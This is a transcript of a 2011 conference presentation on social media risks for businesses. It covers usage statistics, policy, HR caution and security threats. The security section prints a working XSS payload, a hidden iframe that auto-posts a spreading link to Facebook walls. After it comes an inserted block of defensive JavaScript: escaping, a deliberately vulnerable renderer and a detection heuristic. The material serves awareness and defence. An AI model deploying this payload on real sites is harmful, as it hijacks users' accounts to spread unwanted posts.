social media: infiltrating the enterprise

Post on 08-Jun-2015


DESCRIPTION

This presentation was given on June 27th at the 2011 MidTech IT Summit at the Red Rock Resort/Casino in Las Vegas, NV.

TRANSCRIPT

SOCIAL MEDIA: INFILTRATING THE ENTERPRISE

MIDTECH IT Summit June 27th, 2011

JAY A. MCLAUGHLIN, CISSP SVP, CHIEF INFORMATION OFFICER

DISCLAIMER

The materials, thoughts, comments, ideas and opinions expressed throughout this presentation are entirely my own and do not necessarily represent the thoughts or opinions of my employer (past or present).

AGENDA

• Defining social media

• Embracing the Inevitable

• Understanding the Benefits & Risks

• Friending your Customers

• Preventing social media disasters

• Building a strategy

Social media: forms of electronic communication (such as Web sites for social networking and microblogging) through which users create online communities to share information, ideas, personal messages, and other content.

Social media is media for social interaction using highly accessible and scalable communication techniques. Social media is the use of web-based and mobile technologies to turn communication into interactive dialogue.

What is Social Media?

• 500 Million

• 250 Million

• 700 Billion

Source: Facebook.com April 2011

It’s Corporate

• 6939

• 319

• 140 Million

Source: Twitter.com March 2011

It’s Mainstream

• 100 Million

• 2 Million

• 4.3 Billion

Source: LinkedIn.com May 2011

WHY SHOULD WE CARE?

• It's where your customers are

• It's where your prospects are

• Its reach stretches further and broader than any other marketing channel

• It's relevant to be in the game

“We don’t have a choice on whether we will DO social media, the question is how WELL we DO it.”

- Erik Qualman, Author Socialnomics

http://www.youtube.com/user/Socialnomics09?blend=1&ob=5

Source: eMarketer, Nov 2010

* companies that have 100 or more employees

BUSINESS BENEFITS

Enhanced Collaboration

Shared Workspaces

Faster access to Information

Extended Organizational Reach

Ability to Compete

THE EQUALIZER

• When leveraged effectively, social networks become an equalizer, leveling the playing field

• It allows organizations both large and small to compete and be relevant in their space

• Ability to influence with little or no cost

UNANTICIPATED DISASTERS

PREVENTING DISASTERS

IS YOUR ORGANIZATION PREPARED FOR...?

• Employees posting opinions about the organization

• Managing brand reputation and public opinion/exposure

• Responding to positive and negative feedback from customers

• Standing by the decision NOT to get engaged....?

SOCIAL MEDIA SWOT

• Strength - ability to build relationships with your target audience like never before.

• Weakness - siloed as a business function and not integrated in overall business strategy.

• Threat - fear of losing control. Seeks risk aversion. Non-innovative.

• Opportunities - it's where our customers are. Integration with the business is key.

ESTABLISHING A POLICY

THE BASICS

• Do your employees know what is acceptable or permitted?

• How may (or not) employees identify themselves?

• To what degree can corporate content be used?

• Has your organization determined what it can do with information obtained through social media?

Establishing a policy is critical!

• Governance requires implementing and enforcing an acceptable usage policy covering social networking sites

• It is key that all staff receive security awareness training covering your acceptable usage policy for social networking

• Promote good practices to help improve users' behavior, ultimately reducing and/or mitigating some of the risks

• Permit access only to social networking sites that have obvious business benefits, and only for users with a business need

ESTABLISH A STRATEGY

• Institute processes to manage and monitor activity

• Be flexible - there is overall uncertainty about what strategies and tactics to adopt to secure social media

• Understand and identify which users create the most risk

• Create reasonable guidelines that can be followed

• Review sites' terms and conditions to understand the risks associated with each site

ESTABLISH A STRATEGY

REGULATION is coming

For regulated industries, what requirements do you face?

ex. FINRA

Employers know A LOT about their employees/candidates

• HR is tempted to "peek" at these sites to gather information about employees and potential candidates

• Consider discrimination lawsuits! Proceed with caution.

- ex: viewing the online photo/picture of a candidate

• Consistency is KING - it will minimize your risk.

- ex: if conducting a search for ONE candidate, then do so for ALL

• Even if employers have the technical capability to gain access to social networking information of their employees or candidates, it does not imply the legal right to do so.

HR: OBTAINING INFORMATION FROM SOCIAL NETWORKS

consider ALL risks

Is there a need to address how to evaluate the risk of sharing too much information online in relation to the value it brings to the business?

• There is a continued growth in social networking sites being used as an attack distribution platform

• Users are less likely to suspect malware when it is passed on by a friend, as it carries a certain level of authenticity and trust

• Social networks give attackers a potentially powerful point of leverage, sometimes allowing them to launch sophisticated attacks against businesses

• Known weaknesses exist in the security of the networks themselves, which limit our control

Security Concerns

• Session-hijacking / authentication weaknesses

• Profile harvesting leading to social engineering - ex: phishing / spear-phishing

• Cross-site scripting (XSS) / Cross-site request forgery (CSRF)

• Malicious code / Malware - ex: drive-by downloads

“Threatscape” of sites

<iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>

• This bit of HTML/JavaScript would be included in a viral page.

• The code sets the content of the wall post to a message that includes a link to the viral page, then submits the prompt automatically.

XSS Example
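The snippet above only works because the user_message_prompt parameter is echoed into the page unescaped. The following is an added example, not from the original deck, showing the defender's side: the same parameter rendered with HTML escaping (so the injected script becomes inert text) and a scanning heuristic that flags a hidden iframe whose src smuggles a form-submitting script. The function names, the page template and the placeholder host are assumptions for illustration.

```javascript
// Added example (not from the original presentation). Names and the template are
// hypothetical; the host is a constructed placeholder.

// Escape the five characters that matter when reflecting text into HTML.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical server-side rendering of a wall-post prompt. vulnerable=true mirrors
// the unescaped reflection the slide's payload relies on; the default path escapes it.
function renderPromptPage(requestUrl, { vulnerable = false } = {}) {
  const prompt = new URL(requestUrl).searchParams.get("user_message_prompt") || "";
  const body = vulnerable ? prompt : escapeHtml(prompt);
  return `<form method="post"><p>${body}</p><textarea name="message"></textarea></form>`;
}

// Does rendered HTML still contain an executable script tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Page-scanning heuristic: a hidden iframe whose src carries inline script that
// submits a form. Matches the shape of the slide's snippet rather than one string.
function flagsHiddenAutoPostIframe(html) {
  const iframeTag = /<iframe\b(?:[^>"']|"[^"]*"|'[^']*')*>/gi;
  let m;
  while ((m = iframeTag.exec(html)) !== null) {
    const tag = m[0];
    const hidden = /display\s*:\s*none/i.test(tag);
    const src = (tag.match(/src\s*=\s*["']([^"']*)/i) || [])[1] || "";
    let decoded = src;
    try { decoded = decodeURIComponent(src.replace(/\+/g, " ")); } catch (e) { /* keep raw */ }
    if (hidden && /<script/i.test(decoded) && /\.submit\s*\(/i.test(decoded)) return true;
  }
  return false;
}

// Constructed sample on a placeholder host, same shape as the slide's iframe.
const SAMPLE_IFRAME =
  '<iframe id="x" style="display:none;" src="https://social.example/prompt_feed.php?' +
  'user_message_prompt=<script>window.onload=function(){document.forms[0].submit();}</script>"></iframe>';
const SAMPLE_URL = SAMPLE_IFRAME.match(/src="([^"]*)"/)[1];

console.log("unescaped render contains script:", containsScriptTag(renderPromptPage(SAMPLE_URL, { vulnerable: true })));
console.log("escaped render contains script:", containsScriptTag(renderPromptPage(SAMPLE_URL)));
console.log("sample iframe flagged:", flagsHiddenAutoPostIframe(SAMPLE_IFRAME));
```

Output encoding is the fix for the reflection itself; the iframe heuristic is only a coarse triage signal for content scanners and will not catch obfuscated variants.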

Microsoft has documented a steady rise in the number of attacks targeting social networks

Primary vectors:

• Phishing attempts

• Social engineering tactics

Instances of phishing impressions increased from 8.3% to 84.5%

Verizon highlighted in its 2011 DBIR that malware and social engineering were the culprits in 60% of all reported attacks/breaches

Contribution of malware:

• 49% of breaches

• 79% of records stolen

PROTECT & SERVE

Policing Social Media: How do we protect the usage of social networks?

• Is it possible to establish and implement a standard set of guidelines for enterprise users?

• ...that would help to not only prevent data leaks, but also keep emerging social networking malware at bay?

• It requires a combination of technical, behavioral and organizational security controls

“Policing” Social Media

• Social media isn’t a choice anymore… recognize it is a business transformation tool

• Perform a comprehensive risk assessment against all social networks that will be considered for use

• Social networks DO introduce new security risks - take a formal approach to mitigate them through policy enforcement and user education

• Doing nothing is not an option... will you take that risk?

CONCLUSION

QUESTIONS?

Contact Info:

@jaymclaughlin

linkedin.com/jaymclaughlin